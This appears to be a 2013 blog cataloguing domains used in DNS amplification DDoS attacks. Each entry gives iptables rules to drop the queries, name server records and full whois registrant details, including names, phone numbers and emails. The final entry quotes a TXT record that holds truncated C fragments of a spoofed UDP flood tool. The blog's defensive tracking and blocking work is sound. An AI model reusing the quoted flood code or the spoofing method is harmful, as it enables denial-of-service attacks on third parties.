Friday, November 29, 2013

Domain: marusiaattack.pw

Domain: marusiaattack.pw

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x0d4d4152 && 0x2c&0xDFDFDFDF=0x55534941 && 0x30&0xDFDFDFDF=0x41545441 && 0x34&0xDFDFFFDF=0x434b0250 && 0x38&0xDFFF0000=0x57000000" -j DROP -m comment --comment "DROP DNS Q marusiaattack.pw"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 58 --algo bm --hex-string '|0D6d61727573696161747461636b02707700|' -j DROP -m comment --comment "DROP DNS Q marusiaattack.pw"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


No IP source for this domain

Name server:


;; ANSWER SECTION:
marusiaattack.pw. 21600 IN NS ns1.reg.ru.
marusiaattack.pw. 21600 IN NS ns2.reg.ru.


Response:


A 242
NS 2
SOA 1
Rsize 3979


Whois


This whois service is provided by CentralNic Ltd and only contains
information pertaining to Internet domain names we have registered for
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd https://www.centralnic.com/

Domain ID:CNIC-DO1656911
Domain Name:MARUSIAATTACK.PW
Created On:2013-11-28T23:27:45.0Z
Last Updated On:2013-11-28T23:27:46.0Z
Expiration Date:2014-11-28T23:59:59.0Z
Status:TRANSFER PROHIBITED
Status:ADD PERIOD
Registrant ID:H4516280
Registrant Name:Magamed Ishakov
Registrant Organization:Private Person
Registrant Street1:fonar d 81 kv 188
Registrant City:Moscow
Registrant State/Province:Moscow
Registrant Postal Code:119484
Registrant Country:RU
Registrant Phone:+7.9264756756
Registrant Email:webmaster@search-alles.us
Admin ID:H4516283
Admin Name:Magamed Ishakov
Admin Organization:Private Person
Admin Street1:fonar d 81 kv 188
Admin City:Moscow
Admin State/Province:Moscow
Admin Postal Code:119484
Admin Country:RU
Admin Phone:+7.9264756756
Admin Email:webmaster@search-alles.us
Tech ID:H4516286
Tech Name:Magamed Ishakov
Tech Organization:Private Person
Tech Street1:fonar d 81 kv 188
Tech City:Moscow
Tech State/Province:Moscow
Tech Postal Code:119484
Tech Country:RU
Tech Phone:+7.9264756756
Tech Email:webmaster@search-alles.us
Billing ID:H4516289
Billing Name:Magamed Ishakov
Billing Organization:Private Person
Billing Street1:fonar d 81 kv 188
Billing City:Moscow
Billing State/Province:Moscow
Billing Postal Code:119484
Billing Country:RU
Billing Phone:+7.9264756756
Billing Email:webmaster@search-alles.us
Sponsoring Registrar ID:H2440764
Sponsoring Registrar IANA ID:1606
Sponsoring Registrar Organization:Registrar of Domain Names REG.RU, LLC
Sponsoring Registrar Street1:Office 326, House 3 Vasily Petushkov Street
Sponsoring Registrar City:Moscow
Sponsoring Registrar Postal Code:125476
Sponsoring Registrar Country:RU
Sponsoring Registrar Phone:+74955801111
Sponsoring Registrar FAX:+74954915553
Sponsoring Registrar Website:http://www.reg.ru/
Name Server:NS1.REG.RU
Name Server:NS2.REG.RU
DNSSEC:Unsigned





Domain: darkyu.org

Domain: darkyu.org

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x06444152 && 0x2c&0xDFDFDFFF=0x4b595503 && 0x30&0xDFDFDFFF=0x4f524700" -j DROP -m comment --comment "DROP DNS Q darkyu.org"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 52 --algo bm --hex-string '|066461726b7975036f726700|' -j DROP -m comment --comment "DROP DNS Q darkyu.org"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


No IP source for this domain

Name server:


darkyu.org.        86400    IN    NS    dns1.darkyu.org.
darkyu.org.        86400    IN    NS    dns2.darkyu.org.



Response:

TXT 12
Rsize 3219


Whois



Domain ID:D164751413-LROR
Domain Name:DARKYU.ORG
Created On:18-Feb-2012 15:10:15 UTC
Last Updated On:27-Aug-2013 03:12:48 UTC
Expiration Date:18-Feb-2014 15:10:15 UTC
Sponsoring Registrar:Bizcn.com, Inc. (R1248-LROR)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:orgxd29577813738
Registrant Name:xl d
Registrant Organization:dxl dxl
Registrant Street1:beijing beijing
Registrant Street2:
Registrant Street3:
Registrant City:beijing
Registrant State/Province:beijing
Registrant Postal Code:100000
Registrant Country:CN
Registrant Phone:+86.11221122112
Registrant Phone Ext.:
Registrant FAX:+86.11221122112
Registrant FAX Ext.:
Registrant Email:583006337@qq.com
Admin ID:orgxd29577814866
Admin Name:xl d
Admin Organization:xl d
Admin Street1:beijing beijing
Admin Street2:
Admin Street3:
Admin City:beijing
Admin State/Province:beijing
Admin Postal Code:100000
Admin Country:CN
Admin Phone:+86.11221122112
Admin Phone Ext.:
Admin FAX:+86.11221122112
Admin FAX Ext.:
Admin Email:583006337@qq.com
Tech ID:orgxd29577815083
Tech Name:xl d
Tech Organization:xl d
Tech Street1:beijing beijing
Tech Street2:
Tech Street3:
Tech City:beijing
Tech State/Province:beijing
Tech Postal Code:100000
Tech Country:CN
Tech Phone:+86.11221122112
Tech Phone Ext.:
Tech FAX:+86.11221122112
Tech FAX Ext.:
Tech Email:583006337@qq.com
Name Server:DNS1.DARKYU.ORG
Name Server:DNS2.DARKYU.ORG
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC:Unsigned





Thursday, November 28, 2013

Domain: notthebestdomainintheworld.cloudns.org

Domain: notthebestdomainintheworld.cloudns.org

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x1a4e4f54 && 0x2c&0xDFDFDFDF=0x54484542 && 0x30&0xDFDFDFDF=0x45535444 && 0x34&0xDFDFDFDF=0x4f4d4149 && 0x38&0xDFDFDFDF=0x4e494e54 && 0x3c&0xDFDFDFDF=0x4845574f && 0x40&0xDFDFDFFF=0x524c4407 && 0x44&0xDFDFDFDF=0x434c4f55 && 0x48&0xDFDFDFFF=0x444e5303 && 0x4c&0xDFDFDFFF=0x4f524700" -j DROP -m comment --comment "DROP DNS Q notthebestdomainintheworld.cloudns.org"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 80 --algo bm --hex-string '|1A6e6f7474686562657374646f6d61696e696e746865776f726c6407636c6f75646e73036f726700|' -j DROP -m comment --comment "DROP DNS Q notthebestdomainintheworld.cloudns.org"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


94.102.63.239

Name server:


;; ANSWER SECTION:
notthebestdomainintheworld.cloudns.org. 3354 IN NS ns1.cloudns.net.
notthebestdomainintheworld.cloudns.org. 3354 IN NS ns3.cloudns.net.
notthebestdomainintheworld.cloudns.org. 3354 IN NS ns4.cloudns.net.
notthebestdomainintheworld.cloudns.org. 3354 IN NS ns2.cloudns.net.


Response:


A 1347
NS 4
SOA 1
Rsize 2171 9


Whois


NOT FOUND



Wednesday, November 27, 2013

Domain: stopdrugs77.com

Domain: stopdrugs77.com



If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x0b53544f && 0x2c&0xDFDFDFDF=0x50445255 && 0x30&0xDFDFFFFF=0x47533737 && 0x34&0xFFDFDFDF=0x03434f6d" -j DROP -m comment --comment "DROP DNS Q stopdrugs77.com"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 66 --algo bm --hex-string '|0b73 746f706472756773373703636f6d00|' -j DROP -m comment --comment "DROP DNS Q stopdrugs77.com"

More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:

Unknown

Name server:



;; ANSWER SECTION:
stopdrugs77.com. 10800 IN NS a.dns.gandi.net.
stopdrugs77.com. 10800 IN NS b.dns.gandi.net.
stopdrugs77.com. 10800 IN NS c.dns.gandi.net.


Response:


A 239
NS 3
MX 2
SOA 1
Rsize 4027


Whois


Registrars.
Domain Name: stopdrugs77.com
Registry Domain ID: 1836814491_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2013-11-25T21:14:22Z
Creation Date: 2013-11-25T20:17:27Z
Registrar Registration Expiration Date: 2014-11-25T19:17:26Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller:
Domain Status: clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID:
Registrant Name: Vasa Petrov
Registrant Organization:
Registrant Street: Gandi, 63-65 boulevard Massena
Registrant City: (Gandi) Paris
Registrant State/Province:
Registrant Postal Code: (Gandi) 75013
Registrant Country: (Gandi) FR
Registrant Phone: (Gandi) +33.170377666
Registrant Phone Ext:
Registrant Fax: (Gandi) +33.143730576
Registrant Fax Ext:
Registrant Email: 2d531f20f9ec1578c38b964aea7c748f-1815942@contact.gandi.net
Registry Admin ID:
Admin Name: Vasa Petrov
Admin Organization:
Admin Street: Gandi, 63-65 boulevard Massena
Admin City: (Gandi) Paris
Admin State/Province:
Admin Postal Code: (Gandi) 75013
Admin Country: (Gandi) FR
Admin Phone: (Gandi) +33.170377666
Admin Phone Ext:
Admin Fax: (Gandi) +33.143730576
Admin Fax Ext:
Admin Email: 2d531f20f9ec1578c38b964aea7c748f-1815942@contact.gandi.net
Registry Tech ID:
Tech Name: Vasa Petrov
Tech Organization:
Tech Street: Gandi, 63-65 boulevard Massena
Tech City: (Gandi) Paris
Tech State/Province:
Tech Postal Code: (Gandi) 75013
Tech Country: (Gandi) FR
Tech Phone: (Gandi) +33.170377666
Tech Phone Ext:
Tech Fax: (Gandi) +33.143730576
Tech Fax Ext:
Tech Email: 2d531f20f9ec1578c38b964aea7c748f-1815942@contact.gandi.net
Name Server: A.DNS.GANDI.NET
Name Server: B.DNS.GANDI.NET
Name Server: C.DNS.GANDI.NET
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2013-11-27T13:08:25Z <<<

Reseller Email:
Reseller URL:


Thursday, November 21, 2013

Domain: bitchgotraped.cloudns.eu

Domain: bitchgotraped.cloudns.eu

Interesting name :/


If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x0d424954 && 0x2c&0xDFDFDFDF=0x4348474f && 0x30&0xDFDFDFDF=0x54524150 && 0x34&0xDFDFFFDF=0x45440743 && 0x38&0xDFDFDFDF=0x4c4f5544 && 0x3c&0xDFDFFFDF=0x4e530245 && 0x40&0xDFFF0000=0x55000000" -j DROP -m comment --comment "DROP DNS Q bitchgotraped.cloudns.eu"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 66 --algo bm --hex-string '|0D6269746368676f74726170656407636c6f75646e7302657500|' -j DROP -m comment --comment "DROP DNS Q bitchgotraped.cloudns.eu"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


94.102.56.229 - Ecatel

Name server:


;; ANSWER SECTION:
bitchgotraped.cloudns.eu. 3600 IN NS ns1.cloudns.net.
bitchgotraped.cloudns.eu. 3600 IN NS ns4.cloudns.net.
bitchgotraped.cloudns.eu. 3600 IN NS ns2.cloudns.net.
bitchgotraped.cloudns.eu. 3600 IN NS ns3.cloudns.net.


Response:


A 1344
NS 4
SOA 1
Rsize 21657


Whois


No whois



Tuesday, November 19, 2013

Domain: eschenemnogo.com

Domain: eschenemnogo.com

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x0c455343 && 0x2c&0xDFDFDFDF=0x48454e45 && 0x30&0xDFDFDFDF=0x4d4e4f47 && 0x34&0xDFFFDFDF=0x4f03434f && 0x38&0xDFFF0000=0x4d000000" -j DROP -m comment --comment "DROP DNS Q eschenemnogo.com"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 58 --algo bm --hex-string '|0C65736368656e656d6e6f676f03636f6d00|' -j DROP -m comment --comment "DROP DNS Q eschenemnogo.com"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


5.254.103.113

Name server:


;; ANSWER SECTION:
eschenemnogo.com. 10800 IN NS b.dns.gandi.net.
eschenemnogo.com. 10800 IN NS c.dns.gandi.net.
eschenemnogo.com. 10800 IN NS a.dns.gandi.net.


Response:


A 246
MX 2
NS 3
SOA 1
Rsize 4108


Whois



Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: ESCHENEMNOGO.COM
Registrar: GANDI SAS
Whois Server: whois.gandi.net
Referral URL: http://www.gandi.net
Name Server: A.DNS.GANDI.NET
Name Server: B.DNS.GANDI.NET
Name Server: C.DNS.GANDI.NET
Status: clientTransferProhibited
Updated Date: 19-nov-2013
Creation Date: 19-nov-2013
Expiration Date: 19-nov-2014

>>> Last update of whois database: Tue, 19 Nov 2013 19:36:08 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.


The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: eschenemnogo.com
Registry Domain ID: 1836037535_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2013-11-19T14:21:47Z
Creation Date: 2013-11-19T14:02:37Z
Registrar Registration Expiration Date: 2014-11-19T13:02:37Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller:
Domain Status: clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID:
Registrant Name: Vasiliy VOLKOV
Registrant Organization:
Registrant Street: Gandi, 63-65 boulevard Massena
Registrant City: (Gandi) Paris
Registrant State/Province:
Registrant Postal Code: (Gandi) 75013
Registrant Country: (Gandi) FR
Registrant Phone: (Gandi) +33.170377666
Registrant Phone Ext:
Registrant Fax: (Gandi) +33.143730576
Registrant Fax Ext:
Registrant Email: 6b02435cb72bbfef48cf7b37fac804bb-1812680@contact.gandi.net
Registry Admin ID:
Admin Name: Vasiliy VOLKOV
Admin Organization:
Admin Street: Gandi, 63-65 boulevard Massena
Admin City: (Gandi) Paris
Admin State/Province:
Admin Postal Code: (Gandi) 75013
Admin Country: (Gandi) FR
Admin Phone: (Gandi) +33.170377666
Admin Phone Ext:
Admin Fax: (Gandi) +33.143730576
Admin Fax Ext:
Admin Email: 6b02435cb72bbfef48cf7b37fac804bb-1812680@contact.gandi.net
Registry Tech ID:
Tech Name: Vasiliy VOLKOV
Tech Organization:
Tech Street: Gandi, 63-65 boulevard Massena
Tech City: (Gandi) Paris
Tech State/Province:
Tech Postal Code: (Gandi) 75013
Tech Country: (Gandi) FR
Tech Phone: (Gandi) +33.170377666
Tech Phone Ext:
Tech Fax: (Gandi) +33.143730576
Tech Fax Ext:
Tech Email: 6b02435cb72bbfef48cf7b37fac804bb-1812680@contact.gandi.net
Name Server: A.DNS.GANDI.NET
Name Server: B.DNS.GANDI.NET
Name Server: C.DNS.GANDI.NET
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2013-11-19T19:36:43Z <<<

Reseller Email:
Reseller URL:

Personal data access and use are governed by French law, any use for
the purpose of unsolicited mass commercial advertising as well as any
mass or automated inquiries (for any intent other than the
registration or modification of a domain name) are strictly forbidden.
Copy of whole or part of our database without Gandi's endorsement is
strictly forbidden.
The owner of a domain is the person specified as "Registrant Name" for
a natural person and "Registrant Organization" for a legal person.
Domain ownership disputes should be settled using ICANN's Uniform
Dispute Resolution Policy: http://www.icann.org/en/help/dndr#udrp



Domain: x.privetrc.com

Domain: x.privetrc.com

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFFFDF=0x01580850 && 0x2c&0xDFDFDFDF=0x52495645 && 0x30&0xDFDFDFFF=0x54524303 && 0x34&0xDFDFDFFF=0x434f4d00" -j DROP -m comment --comment "DROP DNS Q x.privetrc.com"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 56 --algo bm --hex-string '|017808707269766574726303636f6d00|' -j DROP -m comment --comment "DROP DNS Q x.privetrc.com"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


Unknown

Name server:

privetrc.com. 84009 IN NS ns2.privetrc.com.
privetrc.com. 84009 IN NS ns1.privetrc.com.

;; ADDITIONAL SECTION:
ns1.privetrc.com. 602409 IN A 199.217.118.89
ns2.privetrc.com. 602409 IN A 199.217.118.89


Response:


TXT 1
Rsize


Whois


Domain Name: privetrc.com
Registry Domain ID: 1835437025_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2013-11-18T11:44:24Z
Creation Date: 2013-11-14T16:30:28Z
Registrar Registration Expiration Date: 2014-11-14T15:30:28Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller: 
Domain Status: clientTransferProhibited
Domain Status: 
Domain Status: 
Domain Status: 
Domain Status: 
Registry Registrant ID: 
Registrant Name: Nikolay GERASIMOV
Registrant Organization: 
Registrant Street: Gandi, 63-65 boulevard Massena
Registrant City: (Gandi) Paris
Registrant State/Province: 
Registrant Postal Code: (Gandi) 75013
Registrant Country: (Gandi) FR
Registrant Phone: (Gandi) +33.170377666
Registrant Phone Ext:
Registrant Fax: (Gandi) +33.143730576
Registrant Fax Ext:
Registrant Email: 6f58ac296b52288bf0e92962cc0f4ab3-1810439@contact.gandi.net
Registry Admin ID: 
Admin Name: Nikolay GERASIMOV
Admin Organization: 
Admin Street: Gandi, 63-65 boulevard Massena
Admin City: (Gandi) Paris
Admin State/Province: 
Admin Postal Code: (Gandi) 75013
Admin Country: (Gandi) FR
Admin Phone: (Gandi) +33.170377666
Admin Phone Ext:
Admin Fax: (Gandi) +33.143730576
Admin Fax Ext:
Admin Email: 6f58ac296b52288bf0e92962cc0f4ab3-1810439@contact.gandi.net
Registry Tech ID: 
Tech Name: Nikolay GERASIMOV
Tech Organization: 
Tech Street: Gandi, 63-65 boulevard Massena
Tech City: (Gandi) Paris
Tech State/Province: 
Tech Postal Code: (Gandi) 75013
Tech Country: (Gandi) FR
Tech Phone: (Gandi) +33.170377666
Tech Phone Ext:
Tech Fax: (Gandi) +33.143730576
Tech Fax Ext:
Tech Email: 6f58ac296b52288bf0e92962cc0f4ab3-1810439@contact.gandi.net
Name Server: NS1.PRIVETRC.COM
Name Server: NS2.PRIVETRC.COM
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
DNSSEC: Unsigned




Monday, November 18, 2013

Domain: ym.rctrhash.com

Domain: ym.rctrhash.com

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFFF=0x02594d08 && 0x2c&0xDFDFDFDF=0x52435452 && 0x30&0xDFDFDFDF=0x48415348 && 0x34&0xFFDFDFDF=0x03434f4d && 0x28&0xFF000000=0x00000000" -j DROP -m comment --comment "DROP DNS Q ym.rctrhash.com"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 57 --algo bm --hex-string '|02796d08726374726861736803636f6d00|' -j DROP -m comment --comment "DROP DNS Q ym.rctrhash.com"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


Unknown

Name server:

rctrhash.com. 51269 IN NS ns1.rctrhash.com.
rctrhash.com. 51269 IN NS ns2.rctrhash.com.

;; ADDITIONAL SECTION:
ns1.rctrhash.com. 51269 IN A 89.248.169.48
ns2.rctrhash.com. 51269 IN A 89.248.169.48


Response:


TXT 1
Rsize: 3955


Whois



Registry Domain ID: 1835442286_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2013-11-18T11:46:19Z
Creation Date: 2013-11-14T17:23:42Z
Registrar Registration Expiration Date: 2014-11-14T16:23:42Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller: 
Domain Status: clientTransferProhibited
Domain Status: 
Domain Status: 
Domain Status: 
Domain Status: 
Registry Registrant ID: 
Registrant Name: Grigoriy PETROV
Registrant Organization: 
Registrant Street: Gandi, 63-65 boulevard Massena
Registrant City: (Gandi) Paris
Registrant State/Province: 
Registrant Postal Code: (Gandi) 75013
Registrant Country: (Gandi) FR
Registrant Phone: (Gandi) +33.170377666
Registrant Phone Ext:
Registrant Fax: (Gandi) +33.143730576
Registrant Fax Ext:
Registrant Email: 4a4bed97a0e9d6c2a0d97bc74727e92c-1810474@contact.gandi.net
Registry Admin ID: 
Admin Name: Grigoriy PETROV
Admin Organization: 
Admin Street: Gandi, 63-65 boulevard Massena
Admin City: (Gandi) Paris
Admin State/Province: 
Admin Postal Code: (Gandi) 75013
Admin Country: (Gandi) FR
Admin Phone: (Gandi) +33.170377666
Admin Phone Ext:
Admin Fax: (Gandi) +33.143730576
Admin Fax Ext:
Admin Email: 4a4bed97a0e9d6c2a0d97bc74727e92c-1810474@contact.gandi.net
Registry Tech ID: 
Tech Name: Grigoriy PETROV
Tech Organization: 
Tech Street: Gandi, 63-65 boulevard Massena
Tech City: (Gandi) Paris
Tech State/Province: 
Tech Postal Code: (Gandi) 75013
Tech Country: (Gandi) FR
Tech Phone: (Gandi) +33.170377666
Tech Phone Ext:
Tech Fax: (Gandi) +33.143730576
Tech Fax Ext:
Tech Email: 4a4bed97a0e9d6c2a0d97bc74727e92c-1810474@contact.gandi.net
Name Server: NS1.RCTRHASH.COM
Name Server: NS2.RCTRHASH.COM
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
DNSSEC: Unsigned



Sunday, November 17, 2013

Domain: x.slnm.info

Domain: x.slnm.info

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

This rule should match any single char subdomain for slnm.info:

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFF00FFDF=0x01000453 && 0x2c&0xDFDFDFFF=0x4c4e4d04 && 0x30&0xDFDFDFDF=0x494e464f && 0x34&0xFF000000=0x00000000" -j DROP -m comment --comment "DROP DNS Q x.slnm.info"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 42 --to 53 --algo bm --hex-string '|04736c6e6d04696e666f00|' -j DROP -m comment --comment "DROP DNS Q x.slnm.info"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


Unknown

Name server:

;; ANSWER SECTION:
slnm.info. 21600 IN NS ns1.slnm.info.
slnm.info. 21600 IN NS ns2.slnm.info.

ns1.slnm.info. 86189 IN A 199.217.118.89
ns2.slnm.info. 86189 IN A 199.217.118.89


Response:


TXT 1
Rsize: 3950



TXT record:

x.slnm.info. 81241 IN TXT "void attack(unsigned long srcip, int srcport, unsigned long destip, int destport, char *message){int s = socket (PF_INET, SOCK_RAW, IPPROTO_UDP)\;char packet[4096]\;struct iphdr *iph = (struct iphdr *)packet\;structtcphd" ">" "struct sockaddr_in sin\;struct pseudo_header psh\;sin.sin_family = AF_INET\;sin.sin_port = htons(destport)\;sin.sin_addr.s_addr = destip\; memset (packet, 0, 4096)\;iph->ihl = 5\;iph->version = 4\;iph->tos = 16\;iph->tot_len = sizeof (struct ip) + sizeof (s" ">" "iph->id = htonl (54321)\; iph->frag_off = 0\;iph->ttl = 255\;iph->protocol = IPPROTO_UDP\;iph->check = 0\;iph->saddr = srcip\;iph->daddr = sin.sin_addr.s_addr\;udph->source = htons(srcport)\;strncpy((char *)udph + sizeof (struct udphdr),message, 4096 - (si" ">" "void *thread_attack(void *thread_params){struct pthread_param *params = thread_params\;\009int i\;\009while (1)for (i = 0\; i < params->list_size\; i++)attack(params->victim_ip, rand() % 65534 + 1, params->list[i].ip, params->list[i].port, params->message)\;" ">" "printf(Usage: %s <destip> <destport> <ip_file_list> <time in seconds> <message>/n, argv[0])\;if (argc != 6){printf(JoyPowerBot: %s <destip> <destport> <ip_file_list> <time in seconds> <message>/n, argv[0])\;return -1\;}srand(time(0))\;FILE *pFile =----" ">" "param.list_size = list_size\;param.message = /xFF/xFF/xFF/xFF/x67/x65/x74/x73/x74/x61/x74/x75/x73/x10\;pthread_create( &udp_attack, NULL, thread_attack, (void*) &param)\;printf([*] Attacking../n)\;sleep(atoi(argv[4]))\;printf([!] Done/n)\;return 0\;------" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" 